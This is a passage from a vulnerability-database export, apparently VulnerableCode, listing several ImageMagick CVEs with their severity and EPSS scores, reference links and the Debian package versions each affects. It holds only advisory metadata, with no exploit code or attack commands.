
reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T20:36:04Z/

url

https://bugzilla.redhat.com/show_bug.cgi?id=2116537

reference_url	https://security.gentoo.org/glsa/202405-02
reference_id	GLSA-202405-02
reference_type
scores
url	https://security.gentoo.org/glsa/202405-02

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2022-2719

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8bac-p2pq-vkf1

url VCID-93mt-5yvb-zfga

vulnerability_id VCID-93mt-5yvb-zfga

summary ImageMagick: heap-based buffer overflow in WriteTIFFImage in coders/tiff.c

references

reference_url	http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html
reference_id
reference_type
scores
url	http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html

reference_url	http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html
reference_id
reference_type
scores
url	http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-15141.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-15141.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-15141

reference_id

reference_type

scores

value	0.00089
scoring_system	epss
scoring_elements	0.2543
published_at	2026-04-01T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25254
published_at	2026-04-26T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25332
published_at	2026-04-18T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25302
published_at	2026-04-21T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25262
published_at	2026-04-24T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25496
published_at	2026-04-02T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25533
published_at	2026-04-04T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25305
published_at	2026-04-07T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25373
published_at	2026-04-08T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25418
published_at	2026-04-09T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25429
published_at	2026-04-11T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25388
published_at	2026-04-12T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25334
published_at	2026-04-13T12:55:00Z

value	0.00089
scoring_system	epss
scoring_elements	0.25341
published_at	2026-04-16T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-15141

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://github.com/ImageMagick/ImageMagick6/commit/3c53413eb544cc567309b4c86485eae43e956112
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick6/commit/3c53413eb544cc567309b4c86485eae43e956112

reference_url	https://github.com/ImageMagick/ImageMagick/issues/1560
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/issues/1560

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1767802
reference_id	1767802
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1767802

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16::::::
reference_id	cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16::::::
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-43:q16::::::

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:::::::*
reference_id	cpe:2.3:o:opensuse:leap:15.0:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:::::::*

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:::::::*
reference_id	cpe:2.3:o:opensuse:leap:15.1:::::::*
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:::::::*

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-15141

reference_id

CVE-2019-15141

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://nvd.nist.gov/vuln/detail/CVE-2019-15141

reference_url	https://access.redhat.com/errata/RHSA-2020:1180
reference_id	RHSA-2020:1180
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2020:1180

reference_url	https://usn.ubuntu.com/7053-1/
reference_id	USN-7053-1
reference_type
scores
url	https://usn.ubuntu.com/7053-1/

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-15141

risk_score 3.0

exploitability 0.5

weighted_severity 5.9

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-93mt-5yvb-zfga

url VCID-b38j-8u7n-47ga

vulnerability_id VCID-b38j-8u7n-47ga

summary ImageMagick: Heap buffer over-read in the GetPixelIndex() function

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11540.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11540.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-11540

reference_id

reference_type

scores

value	0.00377
scoring_system	epss
scoring_elements	0.59191
published_at	2026-04-01T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59264
published_at	2026-04-02T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59288
published_at	2026-04-04T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59251
published_at	2026-04-07T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59302
published_at	2026-04-08T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59315
published_at	2026-04-09T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59334
published_at	2026-04-11T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59318
published_at	2026-04-12T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.593
published_at	2026-04-13T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59333
published_at	2026-04-16T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59339
published_at	2026-04-18T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.5932
published_at	2026-04-21T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59298
published_at	2026-04-24T12:55:00Z

value	0.00377
scoring_system	epss
scoring_elements	0.59317
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-11540

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1474924
reference_id	1474924
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1474924

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-11540

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-b38j-8u7n-47ga

url VCID-b7u1-bftt-5kck

vulnerability_id VCID-b7u1-bftt-5kck

summary ImageMagick: heap-based buffer over-read in MagickCore/composite.c in CompositeImage

references

reference_url

